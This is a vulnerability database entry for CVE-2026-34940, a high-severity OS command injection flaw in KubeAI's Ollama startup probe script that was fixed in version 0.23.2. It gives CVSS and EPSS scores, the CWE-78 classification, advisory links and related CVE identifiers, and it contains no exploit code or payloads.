CVE-2026-34940HIGH 8.8EPSS p35.6%

CVE-2026-34940CVE-2026-34940

Description

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

Scoring

CVSS 3.18.8 (HIGH)
VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS0.45% probability of exploitation · percentile 35.6% · 2026-06-19T12:03:05Z
Published2026-04-06
Last modified2026-04-15

Underlying weaknesses· 1

CWE-78

References

  1. https://github.com/kubeai-project/kubeai/security/advisories/GHSA-324q-cwx9-7crr
  2. https://github.com/kubeai-project/kubeai/security/advisories/GHSA-324q-cwx9-7crr

1

TypeTargetConfidenceTier
WeaknessImproper Neutralization of Special Elements used in an OS Command ('OS Command Injection')cwe-780%live

Related by meaning· 6

Nearest entities by semantic similarity across the cs-graph corpus.

CVE
CVE-2026-44345
CVE
CVE-2026-29955
CVE
CVE-2025-69902
CVE
CVE-2026-44346
CVE
CVE-2025-63389
CVE
CVE-2026-39884
Sourced from NVD + FIRST.org EPSS. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.